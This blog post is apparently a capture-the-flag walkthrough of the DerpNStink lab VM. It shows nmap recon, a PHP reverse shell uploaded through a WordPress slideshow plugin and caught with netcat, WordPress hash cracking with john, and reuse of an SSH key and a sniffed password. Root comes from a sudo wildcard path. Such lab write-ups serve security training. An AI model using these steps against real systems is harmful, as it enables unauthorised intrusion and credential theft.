DerpNStink One – Writeup


This machine is,221/

Recon Phase

To start I carried out a host discovery scan

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00030s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for
Host is up (0.00033s latency).
MAC Address: 08:00:27:73:A7:33 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.0064s latency).
MAC Address: 08:00:27:F2:FC:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.20 seconds

As my target was on I carried out a service discovery scan

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.0035s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:F2:FC:A8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds

I then ran some nmap scripts against the target

root@kali:~# nmap -sC
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 997 closed ports
21/tcp open  ftp
22/tcp open  ssh
| ssh-hostkey:
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK
MAC Address: 08:00:27:F2:FC:A8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds

Gaining A Shell

To start I went to check what was on the web server by navigating to in browser

Screenshot 1

And within the source I found the first flag

Screenshot 2


With no leads on where to look next I setup dirbuster

Screenshot 3

Screenshot 4

First I checked out the /webnotes directory

Screenshot 5

This looked like a text file containing some shell logs for a whois command, I decided to see what the note in the directory was at /webnotes/info.txt

Screenshot 6

From this I realised I would need to add derpnstink.local as to my hosts file at some point. But first I went to /temporary

Screenshot 7

The next directory I checked was which redirected to http://derpnstink.local/weblog/. So I needed to setup the hosts file

root@kali:~# echo derpnstink.local | tee -a /etc/hosts

Now I could access the web blog, which turned out to be a wordpress install

Screenshot 8

Within the source I found the slideshow was linking to some .php files

Screenshot 9


When trying to access them, I found shell.php and uoukbgmr.php gave 404s. But elidumfy.php did not and instead displayed the beginning of a comment

Screenshot 10

Through further digging, I found an active install of phpmyadmin at, although as I had no creds this wasn't helpful yet. I instead began to dig further into the blog, locating the login page at http://derpnstink.local/weblog/wp-login.php

Screenshot 11

I tried the standard Admin:admin login which let me in

Screenshot 12

Knowing the slideshow had previously had php uploaded to it, I headed over to its management console to see if I could upload my own php

Screenshot 13

I added a new slide, uploading a copy of /usr/share/webshells/php/php-reverse-shell.php where I had added my own ip and port

Screenshot 14

Once it was uploaded, I needed a listener to receive the shell

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

By clicking on the link to the image I was able to trigger the shell to activate

connect to [] from (UNKNOWN) [] 46380
Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 13:59:08 up  1:28,  0 users,  load average: 0.00, 0.46, 1.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Priv Esc

Now I had a shell I used to normal python trick to spawn a tty shell

$ python -c "import pty;pty.spawn('/bin/bash')"

The first thing I wanted was the user list

www-data@DeRPnStiNK:/$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
ftp:x:118:126:ftp daemon,,,:/srv/ftp:/bin/false
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

From here I wanted to check out the users home directories

www-data@DeRPnStiNK:/$ cd /home
www-data@DeRPnStiNK:/home$ ls -la
drwxr-xr-x  4 root   root   4096 Nov 12  2017 .
drwxr-xr-x 23 root   root   4096 Nov 12  2017 ..
drwx------ 10 mrderp mrderp 4096 Jan  9  2018 mrderp
drwx------ 12 stinky stinky 4096 Jan  9  2018 stinky

As I could not access them, I decided to dig into the web directories

www-data@DeRPnStiNK:/home$ cd /var/www/html
www-data@DeRPnStiNK:/var/www/html$ ls -la
drwxr-xr-x 8 nobody   nogroup   4096 Nov 12  2017 .
drwxr-xr-x 3 root     root      4096 Nov 11  2017 ..
-rw-r--r-- 1 root     root        18 Nov 12  2017 .htaccess
drwxr-xr-x 2 root     root      4096 Nov 11  2017 css
-rw-r--r-- 1 root     root    108987 Nov 11  2017 derp.png
-rw-r--r-- 1 root     root      1298 Nov 12  2017 index.html
drwxr-xr-x 2 root     root      4096 Nov 11  2017 js
drwxr-xr-x 2 root     root      4096 Nov 11  2017 php
-rw-r--r-- 1 root     root        53 Nov 11  2017 robots.txt
-rw-r--r-- 1 root     root    222045 Nov 11  2017 stinky.png
drwxrwxrwx 2 root     root      4096 Nov 12  2017 temporary
drwxr-xr-x 5 www-data root      4096 Dec 12  2017 weblog
drwxr-xr-x 2 root     root      4096 Jan  9  2018 webnotes

Not noticing anything new, I extracted the database user information from the wp-config.php file

www-data@DeRPnStiNK:/var/www/html$ cd weblog
www-data@DeRPnStiNK:/var/www/html/weblog$ ls -la
drwxr-xr-x  5 www-data root     4096 Dec 12  2017 .
drwxr-xr-x  8 nobody   nogroup  4096 Nov 12  2017 ..
-rw-r--r--  1 www-data nogroup   418 Sep 24  2013 index.php
-rw-r--r--  1 www-data nogroup 19935 Dec 12  2017 license.txt
-rw-r--r--  1 www-data nogroup  7322 Dec 12  2017 readme.html
-rw-r--r--  1 www-data nogroup  5456 May 24  2016 wp-activate.php
drwxr-xr-x  9 www-data nogroup  4096 Aug 16  2016 wp-admin
-rw-r--r--  1 www-data nogroup   364 Dec 19  2015 wp-blog-header.php
-rw-r--r--  1 www-data nogroup  1477 May 23  2016 wp-comments-post.php
-rw-r--r--  1 www-data nogroup  2853 Dec 16  2015 wp-config-sample.php
-rw-r--r--  1 www-data root     3123 Nov 11  2017 wp-config.php
drwxr-xr-x  6 www-data nogroup  4096 Nov 12  2017 wp-content
-rw-r--r--  1 www-data nogroup  3286 May 24  2015 wp-cron.php
drwxr-xr-x 17 www-data nogroup 12288 Aug 16  2016 wp-includes
-rw-r--r--  1 www-data nogroup  2382 May 23  2016 wp-links-opml.php
-rw-r--r--  1 www-data nogroup  3353 Apr 14  2016 wp-load.php
-rw-r--r--  1 www-data nogroup 34057 Jun 14  2016 wp-login.php
-rw-r--r--  1 www-data nogroup  7993 Dec 12  2017 wp-mail.php
-rw-r--r--  1 www-data nogroup 13920 Aug 13  2016 wp-settings.php
-rw-r--r--  1 www-data nogroup 29890 May 24  2016 wp-signup.php
-rw-r--r--  1 www-data nogroup  4035 Nov 30  2014 wp-trackback.php
-rw-r--r--  1 www-data nogroup  3064 Jul  6  2016 xmlrpc.php
www-data@DeRPnStiNK:/var/www/html/weblog$ cat wp-config.php
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'mysql');

With credentials for the mysql root user of root:mysql I headed over to the phpmyadmin instance on http://derpnstink.local/php/phpmyadmin/ and used the creds to login

Screenshot 15

Screenshot 16

My plan was to take logins from the wordpress database and test them against other services

Screenshot 17


The username here did not match any users seen on the server, but there was a close match called "stinky". So, I saved the hash in a file called crack.txt and setup john to crack it

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
wedgie57         (unclestinky)
1g 0:00:07:17 DONE (2018-07-11 22:20) 0.002287g/s 6396p/s 6396c/s 6396C/s wedgieboard..wedge8
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I now had some creds of unclestinky:wedgie57 although I knew the username on the server was stinky, so I tried to login with ssh

root@kali:~# ssh [email protected]
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
[email protected]: Permission denied (publickey).

It turned out stinky was limited to access via ssh keys, so I instead tried to login to ftp

root@kali:~# ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( stinky
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Now I was into ftp I began to dig around

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 ..
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls -la
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 ..
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 network-logs
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
-rwxr-xr-x    1 0        0              17 Nov 12  2017 test.txt
drwxr-xr-x    2 0        0            4096 Nov 12  2017 tmp
226 Directory send OK.

My plan was to search each directory and download and files I found, starting with test.txt

ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
226 Transfer complete.
17 bytes received in 0.01 secs (3.2374 kB/s)
ftp> cd ssh
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 ..
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
226 Directory send OK.

Now I found this was multiple layers of "ssh" folders, I navigated through them until I reached the last one

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Nov 13  2017 .
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ..
-rwxr-xr-x    1 0        0            1675 Nov 13  2017 key.txt
226 Directory send OK.
ftp> get key.txt
local: key.txt remote: key.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for key.txt (1675 bytes).
226 Transfer complete.
1675 bytes received in 0.01 secs (268.7713 kB/s)

Finally I went to the network-logs folder at the top level

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 ..
-rwxr-xr-x    1 0        0             719 Nov 12  2017 derpissues.txt
226 Directory send OK.
ftp> get derpissues.txt
local: derpissues.txt remote: derpissues.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for derpissues.txt (719 bytes).
226 Transfer complete.
719 bytes received in 0.00 secs (161.8599 kB/s)

With 3 new files I inspected them

root@kali:~# cat test.txt
vsftpd test file
root@kali:~# cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

This was interesting but didn't help yet as I hadn't seen any packet captures. I had one file left to check

root@kali:~# cat key.txt

As I had what seemed to be an ssh private key I had to chmod the file to work with ssh

root@kali:~# chmod 600 key.txt

Then used it to connect, attempting to access the stinky account

root@kali:~# ssh [email protected] -i key.txt

I attempted to see what I could do

stinky@DeRPnStiNK:~$ sudo -l
[sudo] password for stinky:

Without a password for the account I could not sudo. but I could now access the home directory for stinky

stinky@DeRPnStiNK:~$ ls -la
drwx------ 12 stinky stinky  4096 Jan  9  2018 .
drwxr-xr-x  4 root   root    4096 Nov 12  2017 ..
-rwx------  1 stinky stinky   220 Nov 12  2017 .bash_logout
-rwx------  1 stinky stinky  3637 Nov 12  2017 .bashrc
drwx------  7 stinky stinky  4096 Nov 13  2017 .cache
drwx------  3 stinky stinky  4096 Nov 13  2017 .compiz
drwx------ 13 stinky stinky  4096 Nov 13  2017 .config
drwxr-xr-x  2 stinky stinky  4096 Nov 13  2017 Desktop
-rw-r--r--  1 stinky stinky    25 Nov 13  2017 .dmrc
drwxr-xr-x  2 stinky stinky  4096 Nov 13  2017 Documents
drwxr-xr-x  2 stinky stinky  4096 Nov 13  2017 Downloads
drwxr-xr-x  3 nobody nogroup 4096 Nov 12  2017 ftp
drwx------  3 stinky stinky  4096 Nov 13  2017 .gconf
-rw-------  1 stinky stinky   334 Nov 13  2017 .ICEauthority
drwx------  3 stinky stinky  4096 Nov 13  2017 .local
-rwx------  1 stinky stinky   675 Nov 12  2017 .profile
drwxr-xr-x  2 stinky stinky  4096 Nov 12  2017 .ssh
-rw-------  1 stinky stinky    55 Nov 13  2017 .Xauthority
-rw-------  1 stinky stinky  1463 Nov 13  2017 .xsession-errors

With nothing obvious in the directory, I began to look in the sub directories

stinky@DeRPnStiNK:~$ cd Desktop
stinky@DeRPnStiNK:~/Desktop$ ls -ls
-rwxr-xr-x 1 stinky stinky 72 Nov 12  2017 flag.txt
stinky@DeRPnStiNK:~/Desktop$ cat flag.txt

Now at this point I realised I had somehow missed flag 2. (I did later go back and get it, see the end of this writeup) Although as I was making progress, I continued with my digging

stinky@DeRPnStiNK:~$ cd Documents/
stinky@DeRPnStiNK:~/Documents$ ls -la
drwxr-xr-x  2 stinky stinky    4096 Nov 13  2017 .
drwx------ 12 stinky stinky    4096 Jan  9  2018 ..
-rw-r--r--  1 root   root   4391468 Nov 13  2017 derpissues.pcap

As I now had a pcap, with a similar name to the txt file found on the ftp server. I realised it may have the password used by mrderp when logging into the wordpress site, which could well be the password for the mrderp account on the server, so I needed to exfil the pcap for inspection

root@kali:~# scp -i key.txt [email protected]:~/Documents/derpissues.pcap .
Ubuntu 14.04.5 LTS
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
derpissues.pcap                                                                  100% 4289KB 810.0KB/s   00:05

I took this and inspected it with wireshark. To find what I was looking for I went to "Edit -> Find Packet", I then changed the settings to "Packet Details" and "String" before searching for "mrderp"

Screenshot 18

This found me the password "derpderpderpderpderpderpderp" which meant I had creds of mrderp:derpderpderpderpderpderpderp. I then tried this on ssh

root@kali:~# ssh [email protected]

Now I had another account, this time with a password, I tried to see what it could do

mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

So I can run a program as sudo from the directory, I first had to find it

mrderp@DeRPnStiNK:~$ ls -la
drwx------ 10 mrderp mrderp 4096 Jan  9  2018 .
drwxr-xr-x  4 root   root   4096 Nov 12  2017 ..
-rw-r--r--  1 mrderp mrderp  220 Nov 12  2017 .bash_logout
-rw-r--r--  1 mrderp mrderp 3637 Nov 12  2017 .bashrc
drwx------  8 mrderp mrderp 4096 Nov 13  2017 .cache
drwx------ 14 mrderp mrderp 4096 Nov 13  2017 .config
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Desktop
-rw-r--r--  1 mrderp mrderp   25 Nov 13  2017 .dmrc
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Documents
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Downloads
drwx------  3 mrderp mrderp 4096 Nov 13  2017 .gconf
-rw-------  1 mrderp mrderp  334 Nov 13  2017 .ICEauthority
drwx------  3 mrderp mrderp 4096 Nov 13  2017 .local
-rw-r--r--  1 mrderp mrderp  675 Nov 12  2017 .profile
drwx------  2 mrderp mrderp 4096 Nov 12  2017 .ssh
-rw-------  1 mrderp mrderp   55 Nov 13  2017 .Xauthority
-rw-------  1 mrderp mrderp  831 Nov 13  2017 .xsession-errors

As the folder did not exist, and the sudo referenced a file in a directory I could write to. As such I could make any executable I wanted and run it using sudo. To start I needed to make the directory

mrderp@DeRPnStiNK:~$ mkdir binaries

I then made the derpy executable, I decided to use a shell file which executed a shell

mrderp@DeRPnStiNK:~/binaries$ vi derpy

Inside the file I put


Once the file was created I had to chmod it to be executable before executing it

mrderp@DeRPnStiNK:~/binaries$ chmod +x ./derpy
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy

I now had a shell

# whoami

Now I had a root shell I just needed to get the flag

# cd /root
# ls -la
drwx------ 14 root root 4096 Jan  9  2018 .
drwxr-xr-x 23 root root 4096 Nov 12  2017 ..
-rw-------  1 root root 1391 Jan  9  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------ 10 root root 4096 Nov 12  2017 .cache
drwx------  3 root root 4096 Nov 13  2017 .compiz
drwxr-xr-x 15 root root 4096 Nov 12  2017 .config
drwx------  3 root root 4096 Nov 12  2017 .dbus
drwxr-xr-x  2 root root 4096 Nov 13  2017 Desktop
-rw-r--r--  1 root root   25 Nov 12  2017 .dmrc
drwxr-xr-x  2 root root 4096 Nov 12  2017 Documents
drwxr-xr-x  2 root root 4096 Nov 12  2017 Downloads
drwx------  3 root root 4096 Jan  9  2018 .gconf
drwx------  2 root root 4096 Nov 12  2017 .gvfs
-rw-------  1 root root 2338 Jan  9  2018 .ICEauthority
drwxr-xr-x  3 root root 4096 Nov 12  2017 .local
drwx------  4 root root 4096 Nov 12  2017 .mozilla
-rw-------  1 root root  181 Nov 11  2017 .mysql_history
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
drwx------  2 root root 4096 Nov 11  2017 .ssh
-rw-------  1 root root   55 Jan  9  2018 .Xauthority
-rw-------  1 root root 1431 Jan  9  2018 .xsession-errors
-rw-------  1 root root 1431 Jan  9  2018 .xsession-errors.old
# cd Desktop
# ls -la
drwxr-xr-x  2 root root 4096 Nov 13  2017 .
drwx------ 14 root root 4096 Jan  9  2018 ..
-rw-r--r--  1 root root  180 Jan  9  2018 flag.txt
# cat flag.txt
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!

And the machine was rooted, normally this is where I finish up, but I was missing a flag

The Case Of The Missing Flag

I eventually found the flag in wordpress, I had overlooked it as I already had code execution and a shell which is normally what I can do using wordpress access. But it turned out when I logged into wordpress with the cracked credentials of


Then the menus which had previously been hidden on the admin dashboard became visible

Screenshot 19

Within the draft post I found the missing flag

Screenshot 20


And with the missing flag collected. This machine was completed

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.